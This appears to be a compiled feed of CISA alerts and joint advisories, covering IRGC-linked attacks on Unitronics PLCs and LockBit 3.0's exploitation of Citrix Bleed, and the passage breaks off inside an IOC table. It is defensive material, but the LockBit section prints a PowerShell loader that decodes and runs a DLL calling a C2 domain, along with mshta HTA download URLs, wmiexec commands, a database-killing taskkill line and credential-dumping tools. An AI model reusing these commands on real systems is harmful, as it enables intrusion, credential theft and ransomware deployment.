CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2023-42917 Apple Multiple Products WebKit Memory Corruption Vulnerability CVE-2023-42916 Apple Multiple Products WebKit Out-of-Bounds Read Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Note: To view other newly added vulnerabilities in the catalog, click on the arrow in the "Date Added to Catalog" column—which will sort by descending dates. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

SUMMARY The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors. The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs). These PLCs are commonly used in the Water and Wastewater Systems (WWS) Sector and are additionally used in other industries including, but not limited to, energy, food and beverage manufacturing, and healthcare. The PLCs may be rebranded and appear as different manufacturers and companies. In addition to the recent CISA Alert, the authoring agencies are releasing this joint CSA to share indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with IRGC cyber operations. Since at least November 22, 2023, these IRGC-affiliated cyber actors have continued to compromise default credentials in Unitronics devices. The IRGC-affiliated cyber actors left a defacement image stating, “You have been hacked, down with Israel. Every equipment ‘made in Israel’ is CyberAv3ngers legal target.” The victims span multiple U.S. states. The authoring agencies urge all organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors. This advisory provides observed IOCs and TTPs the authoring agencies assess are likely associated with this IRGC-affiliated APT. For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and the FBI’s Iran Threat webpage. For a PDF version of this CSA, see:  AA23-335A IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities (PDF, 567.87 KB ) For a downloadable copy of IOCs, see: AA23-335A STIX XML (XML, 15.50 KB ) AA23-335A STIX JSON (JSON, 10.84 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See Table 1 for threat actor activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview CyberAv3ngers (also known as CyberAveng3rs, Cyber Avengers) is an Iranian IRGC cyber persona that has claimed responsibility for numerous attacks against critical infrastructure organizations.[1],[2],[3],[4],[5] The group claimed responsibility for cyberattacks in Israel beginning in 2020. CyberAv3ngers falsely claimed they compromised several critical infrastructure organizations in Israel.[2] CyberAv3ngers also reportedly has connections to another IRGC-linked group known as Soldiers of Solomon. Most recently, CyberAv3ngers began targeting U.S.-based WWS facilities that operate Unitronics PLCs.[1] The threat actors compromised Unitronics Vision Series PLCs with human machine interfaces (HMI). These compromised devices were publicly exposed to the internet with default passwords and by default are on TCP port 20256. These PLC and related controllers are often exposed to outside internet connectivity due to the remote nature of their control and monitoring functionalities. The compromise is centered around defacing the controller’s user interface and may render the PLC inoperative. With this type of access, deeper device and network level accesses are available and could render additional, more profound cyber physical effects on processes and equipment. It is not known if additional cyber activities deeper into these PLCs or related control networks and components were intended or achieved. Organizations should consider and evaluate their systems for these possibilities. Threat Actor Activity The authoring agencies have observed the IRGC-affiliated activity since at least October 2023, when the actors claimed credit for the cyberattacks against Israeli PLCs on their Telegram channel. Since November 2023, the authoring agencies have observed the IRGC-affiliated actors target multiple U.S.-based WWS facilities that operate Unitronics Vision Series PLCs. Cyber threat actors likely compromised these PLCs since the PLCs were internet-facing and used Unitronics’ default password. Observed activity includes the following: Between September 13 and October 30, 2023, the CyberAv3ngers Telegram channel displayed both legitimate and false claims of multiple cyberattacks against Israel. CyberAv3ngers targeted Israeli PLCs in the water, energy, shipping, and distribution sectors. On October 18, 2023, the CyberAv3ngers-linked Soldiers of Solomon claimed responsibility for compromising over 50 servers, security cameras, and smart city management systems in Israel; however, majority of these claims were proven false. The group claimed to use a ransomware named “Crucio” against servers where the webcams camera software operated on port 7001. Beginning on November 22, 2023, IRGC cyber actors accessed multiple U.S.-based WWS facilities that operate Unitronics Vision Series PLCs with an HMI likely by compromising internet-accessible devices with default passwords. The targeted PLCs displayed the defacement message, “You have been hacked, down with Israel. Every equipment ‘made in Israel’ is Cyberav3ngers legal target.” INDICATORS OF COMPROMISE See Table 1 for observed IOCs related to CyberAv3nger operations. Table 1: CyberAv3nger IOCs Indicator Type Fidelity Description BA284A4B508A7ABD8070A427386E93E0 MD5 Suspected MD5 hash associated with Crucio Ransomware 66AE21571FAEE1E258549078144325DC9DD60303   SHA1 Suspected SHA1 hash associated with Crucio Ransomware 440b5385d3838e3f6bc21220caa83b65cd5f3618daea676f271c3671650ce9a3   SHA256   Suspected SHA256 hash associated with Crucio Ransomware   178.162.227[.]180 IP address     185.162.235[.]206 IP address     MITRE ATT&CK TACTICS AND TECHNIQUES See Table 2 for referenced threat actor tactics and techniques in this advisory. Table 2: Initial Access Technique Title ID Use Brute Force Techniques T1110 Threat actors obtained login credentials, which they used to successfully log into Unitronics devices and provide root-level access. MITIGATIONS The authoring agencies recommend critical infrastructure organizations, including WWS sector facilities, implement the following mitigations to improve your organization’s cybersecurity posture to defend against CyberAv3ngers activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Note: The below mitigations are based on threat actor activity against Unitronics PLCs but apply to all internet-facing PLCs. Network Defenders The cyber threat actors likely accessed the affected devices—Unitronics Vision Series PLCs with HMI—by exploiting cybersecurity weaknesses, including poor password security and exposure to the internet. To safeguard against this threat, the authoring agencies urge organizations to consider the following: Immediate steps to prevent attack: Change all default passwords on PLCs and HMIs and use a strong password. Ensure the Unitronics PLC default password is not in use. Disconnect the PLC from the public-facing internet. Follow-on steps to strengthen your security posture: Implement multifactor authentication for access to the operational technology (OT) network whenever applicable. If you require remote access, implement a firewall and/or virtual private network (VPN) in front of the PLC to control network access. A VPN or gateway device can enable multifactor authentication for remote access even if the PLC does not support multifactor authentication. Create strong backups of the logic and configurations of PLCs to enable fast recovery. Familiarize yourself with factory resets and backup deployment as preparation in the event of ransomware activity. Keep your Unitronics and other PLC devices updated with the latest versions by the manufacturer. Confirm third-party vendors are applying the above recommended countermeasures to mitigate exposure of these devices and all installed equipment. In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by cyber threat actors: Reduce risk exposure. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. CISA Cyber Hygiene services can help provide additional review of organizations’ internet-accessible assets. Email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services” to get started. Device Manufacturers Although critical infrastructure organizations using Unitronics (including rebranded Unitronics) PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products that are secure by design and default. The authoring agencies urge device manufacturers to take ownership of the security outcomes of their customers by following the principles in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software, primarily: Do not ship products with default passwords. Instead, either ship products with random initial passwords or require users to change the password upon first use. Do not expose administrative interfaces to the internet by default, and take steps to introduce friction should a device be placed in an insecure state. Do not charge extra for basic security features needed to operate the product securely. Support multifactor authentication, including via phishing-resistant methods. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 2). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES EPA: Cybersecurity for the Water Sector CISA: Water and Wastewater Systems Sector CISA Alert: Exploitation of Unitronics PLCs used in Water and Wastewater Systems CISA: Iran Cyber Threat Overview and Advisories FBI: The Iran Threat - Web Page CISA, MITRE: Best Practices for MITRE ATT&CK Mapping CISA: Decider Tool CISA: Cross-Sector Cybersecurity Performance Goals CISA: Cyber Hygiene Services CISA: Shifting the Balance of Cybersecurity Risk - Principles and Approaches for Secure by Design Software CISA: Secure by Design Alert - How Software Manufacturers Can Shield Web Management Interfaces from Malicious Cyber Activity CISA, NSA: NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations CISA: Secure by Design and Default REPORTING All organizations should report suspicious or criminal activity related to information in this CSA to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. Additionally, the WaterISAC encourages members to share information by emailing analyst@waterisac.org, calling 866-H2O-ISAC, or using the online incident reporting form. State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722). REFERENCES CBS News: Municipal Water Authority of Aliquippa hacked by Iranian-backed cyber group Industrial Cyber: Digital Battlegrounds - Evolving Hybrid Kinetic Warfare Bleeping Computer: Israel's Largest Oil Refinery Website Offline After DDoS Attack Dark Reading: Website of Israeli Oil Refinery Taken Offline by Pro-Iranian Attackers X: @CyberAveng3rs DISCLAIMER The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. VERSION HISTORY December 1, 2023: Initial version.

Today, CISA, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD) released a joint Cybersecurity Advisory (CSA) IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors in response to the active exploitation of Unitronics programmable logic controllers (PLCs) in multiple sectors, including U.S. Water and Wastewater Systems (WWS) facilities, by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated advanced persistent threat (APT) cyber actors.  IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series PLCs that are publicly exposed to the internet, through the use of default passwords. The PLCs may be rebranded and appear as different manufacturers and company names.  All organizations, including U.S. Water and Wastewater Systems Facilities, are encouraged to review this joint CSA and implement the recommended actions and mitigations. The mitigations are based on threat actor activity against Unitronics PLCs but apply to all internet-facing PLCs.  

Apple has released security updates to address vulnerabilities within Safari, macOS Sonoma, iOS, and iPadOS. A cyber threat actor could exploit one of these vulnerabilities to take control of an affected system.  CISA encourages users and administrators to review the following advisories and apply necessary updates: Safari 17.1.2 macOS Sonoma 14.1.2 iOS 17.1.2 and iPad 17.1.2

CISA is continually collaborating with partners across government and the private sector. As a result of this collaboration, CISA has concluded that there is insufficient evidence to keep the following CVE in the catalog and has removed it: CVE-2022-28958 DIR-816L Remote Code Execution Vulnerability Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA has assisted a researcher with coordinating the disclosure of multiple researcher-discovered vulnerabilities affecting web-based case and document management systems used by multiple state, county, and municipal courts. Affected systems include products from Tyler Technologies and Catalis and custom software used by specific counties in Florida. In summary, the vulnerabilities allow an unauthenticated, remote attacker to access sensitive documents by manipulating identifiers and file names in URLs. CISA understands that some of the vulnerabilities may have been mitigated. Further information is available in the researcher’s disclosure and a corresponding article. CISA encourages users and administrators to apply security updates as they become available for the following vulnerabilities: Vulnerability Description  CVE-2023-6341 Catalis CM360 allows authentication bypass. CVE-2023-6342 Tyler Technologies Court Case Management Plus "pay for print" allows authentication bypass. CVE-2023-6343 Tyler Technologies Court Case Management Plus use of Aquaforest TIFF Server tssp.aspx allows authentication bypass. CVE-2023-6344 Tyler Technologies Court Case Management Plus use of Aquaforest TIFF Server te003.aspx and te004.aspx allows authentication bypass. CVE-2023-6352 Aquaforest TIFF Server default configuration allows access to arbitrary files. CVE-2023-6353 Tyler Technologies Civil and Criminal Electronic Filing Upload.aspx allows authentication bypass. CVE-2023-6354 Tyler Technologies Magistrate Court Case Management Plus PDFViewer.aspx allows authentication bypass. CVE-2023-6375 Tyler Technologies Magistrate Court Case Management Plus stores backups insecurely. CVE-2023-6376 Henschen & Associates court document management software cache uses predictable file names.

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2023-6345 Google Skia Integer Overflow Vulnerability CVE-2023-49103 ownCloud graphapi Information Disclosure Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Note: To view other newly added vulnerabilities in the catalog, click on the arrow in the "Date Added to Catalog" column—which will sort by descending dates. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA released four Industrial Control Systems (ICS) advisories on November 30, 2023. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-23-334-01 Delta Electronics DOPSoft ICSA-23-334-02 Yokogawa STARDOM ICSA-23-334-03 PTC KEPServerEx ICSA-23-334-04 Mitsubishi Electric FA Engineering Software Products CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

Today, CISA published guidance on How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity as a part of a new Secure by Design (SbD) Alert series.    This SbD Alert urges software manufacturers to proactively prevent the exploitation of vulnerabilities in web management interfaces by designing and developing their products using SbD principles:   Take Ownership of Customer Security Outcomes.  Embrace Radical Transparency and Accountability.    For more information on SbD principles, see Secure by Design and Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. To learn more about this series, and how vendor decisions can reduce harm at a global scale, refer to the Secure by Design Alert Series blog.

CISA released four Industrial Control Systems (ICS) advisories on November 28, 2023. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-23-331-01 Delta Electronics InfraSuite Device Master ICSA-23-331-02 Franklin Electric Fueling Systems Colibri ICSA-23-331-03 Mitsubishi Electric GX Works2 ICSMA-23-331-01 BD FACSChorus   CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

CISA is responding to active exploitation of Unitronics programmable logic controllers (PLCs) used in the Water and Wastewater Systems (WWS) Sector. Cyber threat actors are targeting PLCs associated with WWS facilities, including an identified Unitronics PLC, at a U.S. water facility. In response, the affected municipality’s water authority immediately took the system offline and switched to manual operations—there is no known risk to the municipality’s drinking water or water supply. WWS Sector facilities use PLCs to control and monitor various stages and processes of water and wastewater treatment, including turning on and off pumps at a pump station to fill tanks and reservoirs, flow pacing chemicals to meet regulations, gathering compliance data for monthly regulation reports, and announcing critical alarms to operations.  Attempts to compromise WWS integrity via unauthorized access threaten the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities. The cyber threat actors likely accessed the affected device—a Unitronics Vision Series PLC with a Human Machine Interface (HMI)—by exploiting cybersecurity weaknesses, including poor password security and exposure to the internet. To secure WWS facilities against this threat, CISA urges organizations to: Change all default passwords on PLCs and HMIs and use a strong password. Ensure the Unitronics PLC default password “1111” is not in use.  Require multifactor authentication for all remote access to the OT network, including from the IT network and external networks. Disconnect the PLC from the open internet. If remote access is necessary, control network access to the PLC.    Implement a Firewall/VPN in front of the PLC to control network access to the remote PLC. A VPN or gateway device can enable multifactor authentication for remote access even if the PLC does not support multifactor authentication. Unitronics also has a secure cellular based longhaul transport device that is secure to their cloud services.  Use an allowlist of IPs for access.  Back up the logic and configurations on any Unitronics PLCs to enable fast recovery. Become familiar with the process for factory resetting and deploying configurations to a device in the event of being hit by ransomware. If possible, utilize a TCP port that is different than the default port TCP 20256. Cyber actors are actively targeting TCP 20256 after identifying it through network probing as a port associated to Unitronics PLC. Once identified, they leverage scripts specific to PCOM/TCP to query and validate the system, allowing for further probing and connection. If available, use PCOM/TCP filters to parse out the packets. Update PLC/HMI to the latest version provided by Unitronics. CISA and WWS Sector partners have developed numerous tools and resources that water utilities can use to increase their cybersecurity. Please visit: CISA: Water and Wastewater Cybersecurity EPA: Cybersecurity for the Water Sector WaterISAC: Resource Center American Water Works Association: Cybersecurity and Guidance Report All organizations should report suspicious or criminal activity related to information found in this Alert by contacting CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870, or your local FBI field office. 

SUMMARY Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances. This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization. Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs. Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources. CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center. The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available. For the associated Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed Download the PDF version of this report: AA23-325A LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability (PDF, 631.83 KB ) For a downloadable copy of IOCs, see: AA23-325A STIX XML (XML, 29.22 KB ) AA23-325A STIX JSON (JSON, 23.00 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. CVE-2023-4966 CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563]. After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie. Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance, and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. This critical vulnerability exploit impacts the following software versions [1]: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50 NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19 NetScaler ADC and NetScaler Gateway version 12.1 (EOL) NetScaler ADC 13.1FIPS before 13.1-37.163 NetScaler ADC 12.1-FIPS before 12.1-55.300 NetScaler ADC 12.1-NDcPP before 12.1-55.300 Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks. Threat Actor Activity Malware identified in this campaign is generated beginning with the execution of a PowerShell script (123.ps1) which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path. $y = "TVqQAAMA..." $x = "RyEHABFQ..." $filePath = "C:\Users\Public\adobelib.dll" $fileBytes = [System.Convert]::FromBase64String($y + $x) [System.IO.File]::WriteAllBytes($filePath, $fileBytes) The resulting file (adobelib.dll) is then executed by the PowerShell script using rundll32. rundll32 C:\Users\Public\adobelib.dll,main <104 hex char key> The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software. Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software tools typically associated with ransomware incidents. INDICATORS OF COMPROMISE (IOCS) See Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966. [Fidelity] Legend: High = Indicator is unique or highly indicates LockBit in an environment. Medium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely. Low = Indicates tools that are commonly used but were used by LockBit. Low confidence indicators may not be related to ransomware. Disclaimer: Some IP addresses in this CSA may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors. Table 1: LockBit 3.0 Affiliate Citrix Bleed Campaign Indicator Type Fidelity Description 192.229.221[.]95 IP Low Mag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting. 123.ps1 PowerShell script High Creates and executes payload via script. 193.201.9[.]224 IP High FTP to Russian geolocated IP from compromised system. 62.233.50[.]25 IP High Russian geolocated IP from compromised system. Hxxp://62.233.50[.]25/en-us/docs.html Hxxp://62.233.50[.]25/en-us/test.html 51.91.79[.].17 IP Med Temp.sh IP. Teamviewer Tool (Remote Admin) Low   70.37.82[.]20 IP Low IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc. 185.17.40[.]178 IP Low Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address. Table 2: LockBit 3.0 Affiliate Citrix Bleed Campaign Indicator Type Fidelity Description 185.229.191.41 Anydesk Usage High Anydesk C2. 81.19.135[.]219 IP High Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta 45.129.137[.]233 IP Medium Callouts from known compromised device beginning during the compromised window. 185.229.191[.]41 Anydesk Usage High Anydesk C2. Plink.exe Command interpreter High Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows. AnyDeskMSI.exe Remote admin tool High We do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently. SRUtility.exe Splashtop utility   9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a Netscan exe Network scanning software High 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 Table 3: LockBit 3.0 Affiliate Citrix Bleed Campaign Indicator Type Fidelity Description Scheduled task: \MEGA\MEGAcmd Persistence   High   Scheduled task: UpdateAdobeTask Persistence High   Mag.dll Persistence High Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63. 123.ps1 Script High Creates rundll32 C:\Users\Public\adobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44. Adobelib.dll Persistence Low C2 from adobelib.dll. Adobe-us-updatefiles[.]digital Tool Download High Used to download obfuscated toolsets. 172.67.129[.]176 Tool Download High IP of adobe-us-updatefiles[.]digital. 104.21.1[.]180 Tool Download High Adobe-us-updatefiles[.]digital. cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 Command High wmiexec.exe usage cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 Command High wmiexec.exe usage cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 Command High wmiexec.exe usage cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex Command High wmiexec.exe usage cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1 Command High wmiexec.exe usage The authoring organizations recommended monitoring/reviewing traffic to the 81.19.135[.]* class C network and review for MSHTA being called with HTTP arguments [2]. Table 4: LockBit 3.0 Affiliate Citrix Bleed Campaign Indicator Type Fidelity Description Notes 81.19.135[.]219 IP High Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta   81.19.135[.]220 IP High Russian geolocated IP, seen outbound in logs IP registered to a South African Company 81.19.135[.]226 IP High Russian geolocated IP, seen outbound in logs IP registered to a South African Company Table 5: Citrix Bleed Indicators of Compromise (IOCs) Type Indicator Description Filename c:\users\\downloads\process hacker 2\peview.exe Process hacker Filename c:\users\\music\process hacker 2\processhacker.exe Process hacker Filename psexesvc.exe Psexec service excutable Filename c:\perflogs\processhacker.exe Process hacker Filename c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe Process hacker transferred via screenconnect Filename c:\perflogs\lsass.dmp Lsass dump Filename c:\users\\downloads\mimikatz.exe Mimikatz Filename c:\users\\desktop\proc64\proc.exe Procdump Filename c:\users\\documents\veeam-get-creds.ps1 Decrypt veeam creds Filename secretsdump.py Impacket installed on azure vm Cmdline secretsdump.py /@ -outputfile 1 Impacket installed on azure vm Filename ad.ps1 Adrecon found in powershell transcripts Filename 